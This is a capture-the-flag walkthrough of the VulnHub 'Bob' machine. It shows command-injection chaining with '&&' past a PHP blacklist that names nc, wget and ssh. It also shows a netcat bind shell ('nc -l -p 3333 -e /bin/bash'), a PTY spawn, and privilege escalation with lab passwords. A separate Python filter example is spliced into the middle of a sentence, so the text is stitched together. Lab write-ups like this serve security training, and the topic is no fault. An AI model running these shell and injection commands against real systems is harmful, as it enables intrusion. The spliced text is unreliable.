This article is a walkthrough of how I solved the Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.
It is a beginner-to-intermediate challenge; at the end we have to gain root access and get the flag.
So let’s do this:
To find the vulnerable machines from your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
I used netdiscover to get the IP address of the Bob virtual machine. In my case, the IP address is 192.168.0.107.
netdiscover -r 192.168.0.1/24
I scanned the host with nmap and discovered this:
So 80 and 21 are open. I visited their website.
It is under construction. I couldn't find much information in the source code either. So I fired up nikto to get more info:
nikto -h 192.168.0.107
It says robots.txt is present.
Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Come on people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess every time someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob
login.php and lat_memo.html also don't contain much information. Then I turned to dev_shell.php:
Seems like the admin gave us a command injection platform. I used a lot of commands here, but I will only give the useful ones in this article.
I tried ls as my first command.
But it didn't seem to work, so I tried stacking commands to see if that works, and it does:
cd . &&ls -a gave me the above result. Looking in the current directory, I found two important files: .hint and dev_shell.bak
I downloaded dev_shell.bak. It has the following code:
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<style>
#back{
    position: fixed;
    top: 0;
    left: 0;
    min-width: 100%;
    min-height: 100%;
    z-index:-10
}
#shell{
    color: white;
    text-align: center;
}
</style>
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !== false){
    system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work 😛
}
else{
    $is_he_a_bad_man = explode(' ', trim($command));
    //checks for dangerous commands (only the first space-separated word is compared)
    if (in_array($is_he_a_bad_man[0], $bad_words)){
        system("echo Get out skid lol");
    }
    else{
        //the raw input still goes to system(), i.e. to the shell
        system($_POST['in_command']);
    }
}
?>
It's simply an input-sanitising script that refuses a command when its first word is in the array. Now I know why the ls command was not working. 😛
The .hint file, which is a hidden file, has the following text:
No, I hadn't tried spawning a TTY shell yet. So let's spawn a shell:
A netcat cheat sheet came to the rescue. From the above PHP script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used
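To make the weakness of that filter concrete, here is an added example (mine, not code from the VM) that models the PHP decision logic in Python and puts an allowlist-based check next to it. The allowlist contents and the helper names are assumptions for illustration.

```python
# Added example: models the dev_shell.bak filter and contrasts it with an allowlist
# that never hands user input to a shell. Not code from the Bob VM.
import shlex
import subprocess

# Blacklist copied from dev_shell.bak
BAD_WORDS = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}

# Hypothetical allowlist for the hardened check (assumption, not from the VM)
ALLOWED_COMMANDS = {"whoami", "id", "date", "uptime"}


def dev_shell_filter(command: str) -> str:
    """Same decision as the PHP: only ';' and the first space-separated word are inspected."""
    if ";" in command:
        return "blocked: semicolon"
    first_word = command.strip().split(" ")[0]
    if first_word in BAD_WORDS:
        return "blocked: bad word"
    # The PHP then passes the raw string to system(), i.e. to /bin/sh -c,
    # so &&, ||, | and backticks still reach the shell untouched.
    return "allowed"


def hardened_argv(command: str):
    """Allowlist plus no shell: returns an argv list for subprocess, or None to reject."""
    try:
        argv = shlex.split(command)  # raises ValueError on unbalanced quotes
    except ValueError:
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    # shlex keeps operators as literal tokens; reject them so they can never be
    # interpreted even if someone later switches to shell=True.
    if any(tok in {"&&", "||", "|", "&", ";"} or "`" in tok or "$(" in tok for tok in argv):
        return None
    return argv


def run_hardened(command: str) -> str:
    argv = hardened_argv(command)
    if argv is None:
        return "rejected"
    # shell=False: argv goes straight to execve, no shell parsing at all
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    for cmd in ["ls", "ls; id", "cd . && ls -a", "whoami", "whoami && ls"]:
        print(f"{cmd!r:18} php={dev_shell_filter(cmd):20} hardened={hardened_argv(cmd)}")
```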
cd .&&nc -l -p 3333 -e /bin/bash
and then on my Kali OS I used this command: nc 192.168.0.107 3333
and I got a shell. This is not a proper TTY, so I spawned a bash shell using:
python -c 'import pty;pty.spawn("/bin/bash")'
Once I got the real shell I checked for hidden files. I checked the home directory and found that this VM has four users: bob, elliot, jc and seb. I checked elliot's directory first and landed on the file theadminisdumb.txt, which said:
With this I knew that elliot is not an admin but bob is. It also gives the password of James [who is jc], which is Qwerty, and Elliot's password, which is theadminisdumb. So I tried logging in:
su elliot //password: theadminisdumb doesn’t work
su james //password: Qwerty works
Now I traversed Bob's directory and found a hidden file, .old_passwordfile.html, which gave me the password for Sebastian [user seb]: T1tanium_Pa$$word_Hack3rs_Fear_M3.
su seb //password works 😉
So now I need to know the password for Bob; elliot's password is not required since he is not the admin here. I searched bob's directory for any password file and landed in Downloads.
I then searched the Documents directory, where I came across these files: login.txt.gpg [I misread this file as a jpg before 😛 and then saw it again]
Secret [I overlooked login.txt.gpg for this folder. ;p]
and staff.txt, which doesn't contain much information.
I went into the Secret folder, found notes.sh at the end of it, and opened it.
So I went back and started looking again, all frustrated!!
I found flag.txt in the / directory, but I can't open it unless I am root.
Remember the file login.txt.gpg? That's my last cue!
I googled .gpg and found this:
GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).
login.txt.gpg is an encrypted file and I need a passphrase to decrypt it; all I have is "HARPOCRATES", which I found in Bob's directories.
So I tried gpg -d login.txt.gpg on the console, but it did not prompt for the passphrase. Another problem!
I found out about batch mode, where you can pass the passphrase on the command line itself:
gpg --batch --passphrase HARPOCRATES --decrypt login.txt.gpg
The password for bob is b0bcat_.
I logged in as bob, but I still can't access flag.txt; it gave me this output when I ran cat /flag.txt:
That’s it for now!
Ciao 🙂